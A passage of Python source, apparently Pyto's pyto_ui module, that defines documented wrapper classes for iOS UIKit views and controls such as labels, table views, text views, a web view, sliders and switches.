A boolean indicating whether the view responds to touches.
:rtype: bool
"""
return self.__py_view__.userInteractionEnabled
@user_interaction_enabled.setter
def user_interaction_enabled(self, new_value: bool):
self.__py_view__.userInteractionEnabled = new_value
@property
def clips_to_bounds(self) -> bool:
"""
A boolean value that determines whether subviews are confined to the bounds of the view.
:rtype: bool
"""
return self.__py_view__.clipsToBounds
@clips_to_bounds.setter
def clips_to_bounds(self, new_value: bool):
self.__py_view__.clipsToBounds = new_value
@property
def corner_radius(self) -> float:
"""
The radius to use when drawing rounded corners for the view’s background.
:rtype: float
"""
return self.__py_view__.cornerRadius
@corner_radius.setter
def corner_radius(self, new_value: float):
self.__py_view__.cornerRadius = new_value
@property
def border_width(self) -> float:
"""
The width of the view's border.
:rtype: float
"""
return self.__py_view__.borderWidth
@border_width.setter
def border_width(self, new_value: float):
self.__py_view__.borderWidth = new_value
@property
def border_color(self) -> Color:
"""
The color of the view's border.
:rtype: Color
"""
c = self.__py_view__.borderColor
if c is None:
return None
else:
return Color(c)
@border_color.setter
def border_color(self, new_value: Color):
if new_value is None:
self.__py_view__.borderColor = None
else:
self.__py_view__.borderColor = new_value.__py_color__
@property
def content_mode(self) -> CONTENT_MODE:
"""
A flag used to determine how a view lays out its content when its bounds change.
See `Content Mode <constants.html#content-mode>`_ constants for possible values.
:rtype: `Content Mode <constants.html#content-mode>`_
"""
return self.__py_view__.contentMode
@content_mode.setter
def content_mode(self, new_value: CONTENT_MODE):
self.__py_view__.contentMode = new_value
@property
def appearance(self) -> APPEARANCE:
"""
The appearance of the view.
See `Appearance <constants.html#appearance>`_ constants for possible values.
:rtype: `Appearance <constants.html#appearance>`_
"""
return self.__py_view__.appearance
@appearance.setter
def appearance(self, new_value: APPEARANCE):
self.__py_view__.appearance = new_value
@property
def first_responder(self) -> bool:
"""
(Read Only) A boolean indicating whether the view is the first responder.
``UIKit`` dispatches some types of events, such as motion events, to the first responder initially.
:rtype: bool
"""
return self.__py_view__.firstResponder
def add_subview(self, view: View):
"""
Adds the given view to the receiver's hierarchy.
:param view: The view to add.
"""
self.__py_view__.addSubview(view.__py_view__)
def insert_subview(self, view: View, index: int):
"""
Inserts the given view to the receiver's hierarchy at the given index.
:param view: The view to insert.
:param index: The index where the view should be inserted.
"""
self.__py_view__.insertSubview(view.__py_view__, at=index)
def insert_subview_bellow(self, view: View, bellow_view: View):
"""
Inserts the given view into the receiver's hierarchy below another given view.
:param view: The view to insert.
:param bellow_view: The view above the inserted view.
"""
self.__py_view__.insertSubview(view.__py_view__, bellow=bellow_view.__py_view__)
def insert_subview_above(self, view: View, above_view: View):
"""
Inserts the given view to the receiver's hierarchy above another given view.
:param view: The view to insert.
:param above_view: The view below the inserted view.
"""
self.__py_view__.insertSubview(view.__py_view__, above=above_view.__py_view__)
def remove_from_superview(self):
"""
Removes the view from the parent's hierarchy.
"""
self.__py_view__.removeFromSuperview()
def add_gesture_recognizer(self, gesture_recognizer: GestureRecognizer):
"""
Adds a gesture recognizer.
:param gesture_recognizer: The gesture recognizer to be added.
"""
self.__py_view__.addGestureRecognizer(gesture_recognizer.__py_gesture__)
def remove_gesture_recognizer(self, gesture_recognizer: GestureRecognizer):
"""
Removes a gesture recognizer.
:param gesture_recognizer: The gesture recognizer to be removed.
"""
self.__py_view__.removeGestureRecognizer(gesture_recognizer.__py_gesture__)
@property
def gesture_recognizers(self) -> List[GestureRecognizer]:
"""
(Read Only) Returns all gesture recognizers.
See :meth:`~pyto_ui.View.add_gesture_recognizer`.
:rtype: List[GestureRecognizer]
"""
recognizers = self.__py_view__.gestureRecognizers
if recognizers is None or len(recognizers) == 0:
return []
else:
_recognizers = []
for recognizer in recognizers:
_recognizer = GestureRecognizer(GESTURE_TYPE_TAP)
_recognizer.__py_gesture__ = recognizer
_recognizers.append(_recognizer)
return _recognizers
def size_to_fit(self):
"""
Sizes the view to fit its content.
"""
self.__py_view__.sizeToFit()
def become_first_responder(self) -> bool:
"""
Becomes the first responder. On :class:`~pyto_ui.TextView` and :class:`~pyto_ui.TextField` objects, the keyboard will be shown.
Returns a boolean indicating the success.
:rtype: bool
"""
return self.__py_view__.becomeFirstResponder()
def resign_first_responder(self) -> bool:
"""
Stops being the first responder. On :class:`~pyto_ui.TextView` and :class:`~pyto_ui.TextField` objects, the keyboard will be hidden.
Returns a boolean indicating the success.
:rtype: bool
"""
return self.__py_view__.resignFirstResponder()
@property
def layout(self) -> Callable[[View], None]:
"""
A function called when the view is resized. Takes the view as parameter.
:rtype: Callable[[View], None]
"""
action = self.__py_view__.layoutAction
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@layout.setter
def layout(self, new_value: Callable[[View], None]):
self.__py_view__.pyValue = _values.value(self)
if new_value is None:
self.__py_view__.layoutAction = None
else:
self.__py_view__.layoutAction = _values.value(new_value)
@property
def button_items(self) -> List[ButtonItem]:
"""
A list of :class:`~pyto_ui.ButtonItem` objects to be displayed on the top bar. Works only if the view is the root view presented with :func:`~pyto_ui.show_view` or :meth:`~pyto_ui.View.push`.
:rtype: List[ButtonItem]
"""
items = self.__py_view__.buttonItems
if items is None or len(items) == 0:
return []
else:
_items = []
for item in items:
_item = ButtonItem()
_item.managed = item
_items.append(_item)
return _items
@button_items.setter
def button_items(self, new_value: List[ButtonItem]):
items = []
if new_value is not None and len(new_value) > 0:
for item in new_value:
items.append(item.__py_item__)
self.__py_view__.buttonItems = items
class ImageView(View):
"""
A view displaying an image. The displayed image can be a ``PIL`` image or a ``UIKit`` ``UIImage`` (see :func:`~pyto_ui.image_with_system_name`), or it can be downloaded directly from a URL.
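Example (a minimal usage sketch; the URL is a placeholder):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
image_view = ui.ImageView(url="https://example.com/image.png")
image_view.size = (100, 100)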
"""
def __init__(self, image: "Image" = None, url: str = None):
self.__py_view__ = __UIImageView__.newView()
self.image = image
if url is not None:
self.load_from_url(url)
@property
def image(self) -> "Image":
"""
The image displayed on screen. Can be a ``PIL`` image or a ``UIKit`` ``UIImage``. See :func:`~pyto_ui.image_with_system_name` for more information about how to get a symbol image.
:rtype: PIL.Image.Image
"""
ui_image = self.__py_view__.image
if ui_image is None:
return None
elif ui_image.symbolImage:
return ui_image
else:
return __pil_image_from_ui_image__(ui_image)
@image.setter
def image(self, new_value: "Image"):
if new_value is None:
self.__py_view__.image = None
elif "objc_class" in dir(new_value) and new_value.objc_class == UIImage:
self.__py_view__.image = new_value
else:
self.__py_view__.image = __ui_image_from_pil_image__(new_value)
def load_from_url(self, url):
"""
Loads and displays the image at the given URL.
:param url: The URL of the image.
"""
def _set_image(self, url):
from PIL import Image
self.image = Image.open(urlopen(url))
Thread(target=_set_image, args=(self, url)).start()
class Label(View):
"""
A view displaying non-editable, non-selectable text.
"""
def __init__(self, text: str = ""):
self.__py_view__ = __PyLabel__.newView()
self.text = text
def load_html(self, html):
"""
Loads HTML in the Label.
:param html: The HTML code to load.
"""
self.__py_view__.loadHTML(html)
@property
def text(self) -> str:
"""
The text to be displayed on the view.
:rtype: str
"""
return str(self.__py_view__.text)
@text.setter
def text(self, new_value: str):
self.__py_view__.text = new_value
@property
def text_color(self) -> Color:
"""
The color of the text.
:rtype: Color
"""
c = self.__py_view__.textColor
if c is None:
return None
else:
return Color(c)
@text_color.setter
def text_color(self, new_value: Color):
if new_value is None:
self.__py_view__.textColor = None
else:
self.__py_view__.textColor = new_value.__py_color__
@property
def font(self) -> Font:
"""
The font of the text.
:rtype: Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
@property
def text_alignment(self) -> TEXT_ALIGNMENT:
"""
The text's alignment. For possible values, see `Text Alignment <constants.html#text-alignment>`_ constants.
:rtype: `Text Alignment <constants.html#text-alignment>`_
"""
return self.__py_view__.textAlignment
@text_alignment.setter
def text_alignment(self, new_value: TEXT_ALIGNMENT):
self.__py_view__.textAlignment = new_value
@property
def line_break_mode(self) -> LINE_BREAK_MODE:
"""
The line break mode.
:rtype: `Line Break Mode <constants.html#line-break-mode>`_
"""
return self.__py_view__.lineBreakMode
@line_break_mode.setter
def line_break_mode(self, new_value: LINE_BREAK_MODE):
self.__py_view__.lineBreakMode = new_value
@property
def adjusts_font_size_to_fit_width(self) -> bool:
"""
A boolean indicating whether the label adjusts its font size to fit its size.
:rtype: bool
"""
return self.__py_view__.adjustsFontSizeToFitWidth
@adjusts_font_size_to_fit_width.setter
def adjusts_font_size_to_fit_width(self, new_value: bool):
self.__py_view__.adjustsFontSizeToFitWidth = new_value
@property
def allows_default_tightening_for_truncation(self) -> bool:
return self.__py_view__.allowsDefaultTighteningForTruncation
@allows_default_tightening_for_truncation.setter
def allows_default_tightening_for_truncation(self, new_value: bool):
self.__py_view__.allowsDefaultTighteningForTruncation = new_value
@property
def number_of_lines(self) -> int:
"""
The numbers of lines displayed in the label. Set to ``0`` to show all the text.
:rtype: int
"""
return self.__py_view__.numberOfLines
@number_of_lines.setter
def number_of_lines(self, new_value: int):
self.__py_view__.numberOfLines = new_value
class TableViewCell(View):
"""
A cell contained in a :class:`~pyto_ui.TableView`.
Can have a title, a subtitle, an image and an accessory view.
For a list of supported styles, see `Table View Cell Style <constants.html#table-view-cell-style>`_ constants.
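Example (a minimal sketch; ``TABLE_VIEW_CELL_STYLE_SUBTITLE`` is assumed to be one of the documented style constants):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
cell = ui.TableViewCell(ui.TABLE_VIEW_CELL_STYLE_SUBTITLE)
cell.text_label.text = "Title"
cell.detail_text_label.text = "Subtitle"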
"""
def __init__(
self, style: TABLE_VIEW_STYLE = __v__("TABLE_VIEW_CELL_STYLE_DEFAULT")
):
if style == "TABLE_VIEW_CELL_STYLE_DEFAULT":
self.__py_view__ = __PyTableViewCell__.newViewWithStyle(
TABLE_VIEW_CELL_STYLE_DEFAULT
)
else:
self.__py_view__ = __PyTableViewCell__.newViewWithStyle(style)
self.__py_view__.managedValue = _values.value(self)
@property
def movable(self) -> bool:
"""
A boolean indicating whether the cell is movable. If set to ``True``, the container :class:`TableViewSection` object should handle the move.
:rtype: bool
"""
return self.__py_view__.movable
@movable.setter
def movable(self, new_value: bool):
self.__py_view__.movable = new_value
@property
def removable(self) -> bool:
"""
A boolean indicating whether the cell is removable. If set to ``True``, the container :class:`TableViewSection` object should handle the removal.
:rtype: bool
"""
return self.__py_view__.removable
@removable.setter
def removable(self, new_value: bool):
self.__py_view__.removable = new_value
@property
def content_view(self) -> View:
"""
(Read Only) The view contained in the cell. Custom views should be added inside it.
:rtype: View
"""
_view = View()
_view.__py_view__ = self.__py_view__.contentView
return _view
@property
def image_view(self) -> ImageView:
"""
(Read Only) The view containing an image. May return ``None`` for some `Table View Cell Style <constants.html#table-view-cell-style>`_ values.
:rtype: ImageView
"""
view = self.__py_view__.imageView
if view is None:
return None
else:
_view = ImageView()
_view.__py_view__ = view
return _view
@property
def text_label(self) -> Label:
"""
(Read Only) The label containing the main text of the cell.
:rtype: Label
"""
view = self.__py_view__.textLabel
if view is None:
return None
else:
_view = Label()
_view.__py_view__ = view
return _view
@property
def detail_text_label(self) -> Label:
"""
(Read Only) The label containing secondary text. May return ``None`` for some `Table View Cell Style <constants.html#table-view-cell-style>`_ values.
:rtype: Label
"""
view = self.__py_view__.detailLabel
if view is None:
return None
else:
_view = Label()
_view.__py_view__ = view
return _view
@property
def accessory_type(self) -> ACCESSORY_TYPE:
"""
The type of accessory view placed to the right of the cell. See `Accessory Type <constants.html#accessory_type>`_ constants for possible values.
:rtype: `Accessory Type <constants.html#accessory_type>`_.
"""
return self.__py_view__.accessoryType
@accessory_type.setter
def accessory_type(self, new_value: ACCESSORY_TYPE):
self.__py_view__.accessoryType = new_value
class TableView(View):
"""
A view containing a list of cells.
A Table View has a list of :class:`TableViewSection` objects that represent groups of cells, and two possible styles. See `Table View Style <constants.html#table-view-style>`_.
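Example (a minimal usage sketch using classes defined in this module):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
cells = []
for fruit in ("Apple", "Banana", "Cherry"):
cell = ui.TableViewCell()
cell.text_label.text = fruit
cells.append(cell)
section = ui.TableViewSection("Fruits", cells)
table_view = ui.TableView(sections=[section])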
"""
def __init__(
self,
style: TABLE_VIEW_STYLE = __v__("TABLE_VIEW_STYLE_PLAIN"),
sections: List[TableViewSection] = [],
):
if style == "TABLE_VIEW_STYLE_PLAIN":
self.__py_view__ = __PyTableView__.newViewWithStyle(TABLE_VIEW_STYLE_PLAIN)
else:
self.__py_view__ = __PyTableView__.newViewWithStyle(style)
self.__py_view__.managedValue = _values.value(self)
self.sections = sections
@property
def reload_action(self) -> Callable[[TableView], None]:
"""
A function called when the Table View is reloaded (for example, when the user pulls its content to refresh). Takes the Table View as parameter.
:rtype: Callable[[TableView], None]
"""
action = self.__py_view__.reloadAction
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@reload_action.setter
def reload_action(self, new_value: Callable[[TableView], None]):
if new_value is None:
self.__py_view__.reloadAction = None
else:
self.__py_view__.reloadAction = _values.value(new_value)
@property
def edit_button_item(self) -> ButtonItem:
"""
Returns a bar button item that toggles its title and associated state between Edit and Done.
The button item is set up to edit the Table View.
:rtype: ButtonItem
"""
item = ButtonItem()
item.__py_item__ = self.__py_view__.editButtonItem
return item
@property
def sections(self) -> List[TableViewSection]:
"""
A list of :class:`TableViewSection` objects containing cells to be displayed on the Table View.
Setting a new value will automatically reload the contents of the Table View.
:rtype: List[TableViewSection]
"""
sections = self.__py_view__.sections
py_sections = []
for section in sections:
py_section = TableViewSection("", [])
py_section.__py_section__ = section
py_sections.append(py_section)
return py_sections
@sections.setter
def sections(self, new_value: List[TableViewSection]):
sections = []
for section in new_value:
section.__py_section__.tableView = self.__py_view__
sections.append(section.__py_section__)
self.__py_view__.sections = sections
def deselect_row(self):
"""
Deselects the current selected row.
"""
self.__py_view__.deselectRowAnimated(True)
class TextView(View):
"""
An editable, multiline and scrollable view containing text.
"""
def __init__(self, text=""):
self.__py_view__ = __PyTextView__.newView()
self.__py_view__.managedValue = _values.value(self)
self.text = text
@property
def selected_range(self) -> Tuple[int, int]:
"""
The selected text range, as a tuple of two integers (start, end).
:rtype: Tuple[int, int]
"""
return (int(self.__py_view__.range[0]), int(self.__py_view__.range[1]))
@property
def did_begin_editing(self) -> Callable[[TextView], None]:
"""
A function called when the Text View begins editing. Takes the sender Text View as parameter.
:rtype: Callable[[TextView], None]
"""
action = self.__py_view__.didBeginEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_begin_editing.setter
def did_begin_editing(self, new_value: Callable[[TextView], None]):
if new_value is None:
self.__py_view__.didBeginEditing = None
else:
self.__py_view__.didBeginEditing = _values.value(new_value)
@property
def did_end_editing(self) -> Callable[[TextView], None]:
"""
A function called when the Text View ends editing. Takes the sender Text View as parameter.
:rtype: Callable[[TextView], None]
"""
action = self.__py_view__.didEndEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_end_editing.setter
def did_end_editing(self, new_value: Callable[[TextView], None]):
if new_value is None:
self.__py_view__.didEndEditing = None
else:
self.__py_view__.didEndEditing = _values.value(new_value)
@property
def did_change(self) -> Callable[[TextView], None]:
"""
A function called when the Text View's text changes. Takes the sender Text View as parameter.
:rtype: Callable[[TextView], None]
"""
action = self.__py_view__.didChangeText
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_change.setter
def did_change(self, new_value: Callable[[TextView], None]):
if new_value is None:
self.__py_view__.didChangeText = None
else:
self.__py_view__.didChangeText = _values.value(new_value)
def load_html(self, html):
"""
Loads HTML in the Text View.
:param html: The HTML code to load.
"""
self.__py_view__.loadHTML(html)
@property
def text(self) -> str:
"""
The text contained in the view.
:rtype: str
"""
return str(self.__py_view__.text)
@text.setter
def text(self, new_value: str):
self.__py_view__.text = new_value
@property
def editable(self) -> bool:
"""
A boolean indicating whether the text is editable.
:rtype: bool
"""
return self.__py_view__.editable
@editable.setter
def editable(self, new_value: bool):
self.__py_view__.editable = new_value
@property
def selectable(self) -> bool:
"""
A boolean indicating whether the text is selectable.
:rtype: bool
"""
return self.__py_view__.selectable
@selectable.setter
def selectable(self, new_value: bool):
self.__py_view__.selectable = new_value
@property
def text_color(self) -> Color:
"""
The color of the text displayed on screen.
:rtype: Color
"""
c = self.__py_view__.textColor
if c is None:
return None
else:
return Color(c)
@text_color.setter
def text_color(self, new_value: Color):
if new_value is None:
self.__py_view__.textColor = None
else:
self.__py_view__.textColor = new_value.__py_color__
@property
def font(self) -> Font:
"""
The font of the text displayed on screen.
:rtype: Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
@property
def text_alignment(self) -> TEXT_ALIGNMENT:
"""
The alignment of the text displayed on screen. See `Text Alignment <constants.html#text-alignment>`_ constants for possible values.
:rtype: `Text Alignment <constants.html#text-alignment>`_
"""
return self.__py_view__.textAlignment
@text_alignment.setter
def text_alignment(self, new_value: TEXT_ALIGNMENT):
self.__py_view__.textAlignment = new_value
@property
def smart_dashes(self) -> bool:
"""
A boolean indicating whether smart dashes are enabled.
:rtype: bool
"""
return self.__py_view__.smartDashes
@smart_dashes.setter
def smart_dashes(self, new_value: bool):
self.__py_view__.smartDashes = new_value
@property
def smart_quotes(self) -> bool:
"""
A boolean indicating whether smart quotes are enabled.
:rtype: bool
"""
return self.__py_view__.smartQuotes
@smart_quotes.setter
def smart_quotes(self, new_value: bool):
self.__py_view__.smartQuotes = new_value
@property
def keyboard_type(self) -> KEYBOARD_TYPE:
"""
The type of keyboard to use while editing the text. See `Keyboard Type <constants.html#keyboard-type>`_ constants for possible values.
:rtype: `Keyboard Type <constants.html#keyboard-type>`_
"""
return self.__py_view__.keyboardType
@keyboard_type.setter
def keyboard_type(self, new_value: KEYBOARD_TYPE):
self.__py_view__.keyboardType = new_value
@property
def autocapitalization_type(self) -> AUTO_CAPITALIZE:
"""
The type of autocapitalization to use while editing the text. See `Auto Capitalization <constants.html#auto-capitalization>`_ constants for possible values.
:rtype: `Auto Capitalization <constants.html#auto-capitalization>`_
"""
return self.__py_view__.autocapitalizationType
@autocapitalization_type.setter
def autocapitalization_type(self, new_value: AUTO_CAPITALIZE):
self.__py_view__.autocapitalizationType = new_value
@property
def autocorrection(self) -> bool:
"""
A boolean indicating whether autocorrection is enabled.
:rtype: bool
"""
return self.__py_view__.autocorrection
@autocorrection.setter
def autocorrection(self, new_value: bool):
self.__py_view__.autocorrection = new_value
@property
def keyboard_appearance(self) -> KEYBOARD_APPEARANCE:
"""
The appearance of the keyboard used while editing the text. See `Keyboard Appearance <constants.html#keyboard-appearance>`_ constants for possible values.
:rtype: `Keyboard Appearance <constants.html#keyboard-appearance>`_
"""
return self.__py_view__.keyboardAppearance
@keyboard_appearance.setter
def keyboard_appearance(self, new_value: KEYBOARD_APPEARANCE):
self.__py_view__.keyboardAppearance = new_value
@property
def return_key_type(self) -> RETURN_KEY_TYPE:
"""
The type of return key to show on the keyboard used to edit the text. See `Return Key Type <constants.html#return-key-type>`_ constants for possible values.
:rtype: `Return Key Type <constants.html#return-key-type>`_
"""
return self.__py_view__.returnKeyType
@return_key_type.setter
def return_key_type(self, new_value: RETURN_KEY_TYPE):
self.__py_view__.returnKeyType = new_value
@property
def secure(self) -> bool:
"""
A boolean indicating whether the keyboard should be configured to enter sensitive data.
:rtype: bool
"""
return self.__py_view__.isSecureTextEntry
@secure.setter
def secure(self, new_value: bool):
self.__py_view__.isSecureTextEntry = new_value
if "widget" not in os.environ:
class WebView(View):
"""
A View that displays web content.
"""
class JavaScriptException(Exception):
"""
An exception raised while running JavaScript code. Raised by :meth:`~pyto_ui.WebView.evaluate_js`.
"""
pass
def __init__(self, url: str = None):
self.__py_view__ = __PyWebView__.newView()
self.__py_view__.managedValue = _values.value(self)
if url is not None:
self.load_url(url)
def evaluate_js(self, code) -> str:
"""
Runs JavaScript code and returns a string representation of the evaluation result. Raises a :class:`~pyto_ui.WebView.JavaScriptException` if the evaluation fails.
:param code: JavaScript code to run.
:rtype: str
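Example (a minimal sketch; the page is assumed to have finished loading):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
web_view = ui.WebView(url="https://example.com")
def loaded(sender):
print(sender.evaluate_js("document.title"))
web_view.did_finish_loading = loaded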
"""
result = self.__py_view__.evaluateJavaScript(code)
if result is None:
return None
else:
result = str(result)
if result.startswith("_VALULE_:"):
return result.replace("_VALULE_:", "", 1)
elif result.endswith("_ERROR_:"):
raise self.__class__.JavaScriptException(
result.replace("_ERROR_:", "", 1)
)
def load_url(self, url: str):
"""
Loads a URL.
:param url: The URL to load. Can be 'http://', 'https://' or 'file://'.
"""
self.__py_view__.loadURL(url)
def load_html(self, html: str, base_url: str = None):
"""
Loads an HTML string.
:param html: The HTML code to load.
:param base_url: An optional URL used to resolve relative paths.
"""
baseURL = base_url
if baseURL is not None:
baseURL = str(base_url)
self.__py_view__.loadHTML(html, baseURL=baseURL)
def reload(self):
"""
Reloads the Web View.
"""
self.__py_view__.reload()
def stop(self):
"""
Stops loading content.
"""
self.__py_view__.stop()
def go_back(self):
"""
Goes back.
"""
self.__py_view__.goBack()
def go_forward(self):
"""
Goes forward.
"""
self.__py_view__.goForward()
@property
def can_go_back(self) -> bool:
"""
(Read Only) A boolean indicating whether :meth:`~pyto_ui.WebView.go_back` can be performed.
:rtype: bool
"""
return self.__py_view__.canGoBack
@property
def can_go_forward(self) -> bool:
"""
(Read Only) A boolean indicating whether :meth:`~pyto_ui.WebView.go_forward` can be performed.
:rtype: bool
"""
return self.__py_view__.canGoForward
@property
def is_loading(self) -> bool:
"""
(Read Only) A boolean indicating whether the Web View is loading content.
:rtype: bool
"""
return self.__py_view__.isLoading
@property
def url(self) -> str:
"""
(Read Only) The current URL loaded into the Web View.
:rtype: str
"""
url = self.__py_view__.url
if url is None:
return None
else:
return str(url)
@property
def did_start_loading(self) -> Callable[[WebView], None]:
"""
A function called when the Web View starts loading contents. Takes the sender Web View as parameter.
:rtype: Callable[[WebView], None]
"""
action = self.__py_view__.didStartLoading
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_start_loading.setter
def did_start_loading(self, new_value: Callable[[WebView], None]):
if new_value is None:
self.__py_view__.didStartLoading = None
else:
self.__py_view__.didStartLoading = _values.value(new_value)
@property
def did_finish_loading(self) -> Callable[[WebView], None]:
"""
A function called when the Web View finished loading contents. Takes the sender Web View as parameter.
:rtype: Callable[[WebView], None]
"""
action = self.__py_view__.didFinishLoading
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_finish_loading.setter
def did_finish_loading(self, new_value: Callable[[WebView], None]):
if new_value is None:
self.__py_view__.didFinishLoading = None
else:
self.__py_view__.didFinishLoading = _values.value(new_value)
@property
def did_fail_loading(self) -> Callable[[WebView, str], None]:
"""
A function called when the Web View failed to load contents. Takes the sender Web View and a string describing the error as parameters.
:rtype: Callable[[WebView, str], None]
"""
action = self.__py_view__.didFailLoading
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_fail_loading.setter
def did_fail_loading(self, new_value: Callable[[WebView, str], None]):
if new_value is None:
self.__py_view__.didFailLoading = None
else:
self.__py_view__.didFailLoading = _values.value(new_value)
##################
# MARK: - Control Classes
##################
class Control(View):
"""
The base class for controls, which are visual elements that convey a specific action or intention in response to user interactions.
Inherited by :class:`Button`, :class:`SegmentedControl`, :class:`Slider`, :class:`Switch` and :class:`TextField`.
"""
def __init__(self):
self.__py_view__ = __PyControl__.newView()
self.__py_view__.managedValue = _values.value(self)
@property
def enabled(self) -> bool:
"""
A boolean indicating whether the control is enabled.
:rtype: bool
"""
return self.__py_view__.enabled
@enabled.setter
def enabled(self, new_value: bool):
self.__py_view__.enabled = new_value
@property
def horizontal_alignment(self) -> HORZONTAL_ALIGNMENT:
"""
The horizontal alignment of the view's contents. See `Horizontal Alignment <constants.html#horizontal-alignment>`_ constants for possible values.
:rtype: `Horizontal Alignment <constants.html#horizontal-alignment>`_
"""
return self.__py_view__.contentHorizontalAlignment
@horizontal_alignment.setter
def horizontal_alignment(self, new_value: HORZONTAL_ALIGNMENT):
self.__py_view__.contentHorizontalAlignment = new_value
@property
def vertical_alignment(self) -> VERTICAL_ALIGNMENT:
"""
The vertical alignment of the view's contents. See `Vertical Alignment <constants.html#vertical-alignment>`_ constants for possible values.
:rtype: `Vertical Alignment <constants.html#vertical-alignment>`_
"""
return self.__py_view__.contentVerticalAlignment
@vertical_alignment.setter
def vertical_alignment(self, new_value: VERTICAL_ALIGNMENT):
self.__py_view__.contentVerticalAlignment = new_value
@property
def action(self) -> Callable[[Control], None]:
"""
A function called when the control triggers its action.
For example, a :class:`Button` object calls this function when it's pressed.
Takes the :class:`Control` object as parameter.
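Example (a minimal sketch using a :class:`Button`):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
def pressed(sender):
sender.title = "Pressed!"
button = ui.Button(title="Press me")
button.action = pressed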
:rtype: Callable[[Control], None]
"""
action = self.__py_view__.action
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@action.setter
def action(self, new_value: Callable[[Control], None]):
if new_value is None:
self.__py_view__.action = None
else:
self.__py_view__.action = _values.value(new_value)
class SegmentedControl(Control):
"""
A horizontal control made of multiple segments, each segment functioning as a discrete button.
The function passed to :data:`~pyto_ui.Control.action` will be called when the segmented control changes its selection.
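Example (a minimal usage sketch):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
def selection_changed(sender):
print(sender.segments[sender.selected_segment])
control = ui.SegmentedControl(["One", "Two", "Three"])
control.action = selection_changed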
"""
def __init__(self, segments: List[str] = []):
self.__py_view__ = __PySegmentedControl__.newView()
self.__py_view__.managedValue = _values.value(self)
self.segments = segments
@property
def segments(self) -> List[str]:
"""
A list of strings representing segments titles.
:rtype: List[str]
"""
return list(map(str, self.__py_view__.segments))
@segments.setter
def segments(self, new_value: List[str]):
self.__py_view__.segments = new_value
@property
def selected_segment(self) -> int:
"""
The index of the selected segment.
:rtype: int
"""
return self.__py_view__.selectedSegmentIndex
@selected_segment.setter
def selected_segment(self, new_value: int):
self.__py_view__.selectedSegmentIndex = new_value
class Slider(Control):
"""
A control used to select a single value from a continuous range of values. The default range is located between ``0`` and ``1``.
The function passed to :data:`~pyto_ui.Control.action` will be called when the slider changes its value.
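Example (a minimal usage sketch):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
def value_changed(sender):
print(sender.value)
slider = ui.Slider(value=0.5)
slider.minimum_value = 0
slider.maximum_value = 10
slider.action = value_changed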
"""
def __init__(self, value: float = 0.5):
self.__py_view__ = __PySlider__.newView()
self.__py_view__.managedValue = _values.value(self)
self.value = value
def set_value_with_animation(self, value: float):
"""
Sets the value of the slider with an animation.
:param value: The value of the slider.
"""
self.__py_view__.setValue(value, animated=True)
@property
def value(self) -> float:
"""
The value of the slider between its range.
:rtype: float
"""
return self.__py_view__.value
@value.setter
def value(self, new_value: float):
self.__py_view__.value = new_value
@property
def minimum_value(self) -> float:
"""
The minimum value of the slider.
:rtype: float
"""
return self.__py_view__.minimumValue
@minimum_value.setter
def minimum_value(self, new_value: float):
self.__py_view__.minimumValue = new_value
@property
def maximum_value(self) -> float:
"""
The maximum value of the slider.
:rtype: float
"""
return self.__py_view__.maximumValue
@maximum_value.setter
def maximum_value(self, new_value: float):
self.__py_view__.maximumValue = new_value
@property
def minimum_track_color(self) -> Color:
"""
The color used to tint the default minimum track.
:rtype: Color
"""
c = self.__py_view__.minimumTrackColor
if c is None:
return None
else:
return Color(c)
@minimum_track_color.setter
def minimum_track_color(self, new_value: Color):
if new_value is None:
self.__py_view__.minimumTrackColor = None
else:
self.__py_view__.minimumTrackColor = new_value.__py_color__
@property
def maximum_track_color(self) -> Color:
"""
The color used to tint the default maximum track.
:rtype: Color
"""
c = self.__py_view__.maximumTrackColor
if c is None:
return None
else:
return Color(c)
@maximum_track_color.setter
def maximum_track_color(self, new_value: Color):
if new_value is None:
self.__py_view__.maximumTrackColor = None
else:
self.__py_view__.maximumTrackColor = new_value.__py_color__
@property
def thumb_color(self) -> Color:
"""
The color used to tint the default thumb.
:rtype: Color
"""
c = self.__py_view__.thumbColor
if c is None:
return None
else:
return Color(c)
@thumb_color.setter
def thumb_color(self, new_value: Color):
if new_value is None:
self.__py_view__.thumbColor = None
else:
self.__py_view__.thumbColor = new_value.__py_color__
class Switch(Control):
"""
A control that offers a binary choice, such as On/Off.
The function passed to :data:`~pyto_ui.Control.action` will be called when the switch changes its value.
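Example (a minimal usage sketch):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
def switched(sender):
print("On" if sender.on else "Off")
switch = ui.Switch(on=True)
switch.action = switched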
"""
def __init__(self, on=False):
self.__py_view__ = __PySwitch__.newView()
self.__py_view__.managedValue = _values.value(self)
self.on = on
def set_on_with_animation(self, on: bool):
"""
Sets the state of the switch to On or Off with an animation.
:param on: A boolean indicating whether the switch should be On.
"""
self.__py_view__.setOn(on, animated=True)
@property
def on(self) -> bool:
"""
A boolean indicating whether the switch is On.
:rtype: bool
"""
return self.__py_view__.isOn
@on.setter
def on(self, new_value: bool):
self.__py_view__.isOn = new_value
@property
def on_color(self) -> Color:
"""
The color used to tint the appearance of the switch when it is turned on.
:rtype: Color
"""
c = self.__py_view__.onColor
if c is None:
return None
else:
return Color(c)
@on_color.setter
def on_color(self, new_value: Color):
if new_value is None:
self.__py_view__.onColor = None
else:
self.__py_view__.onColor = new_value.__py_color__
@property
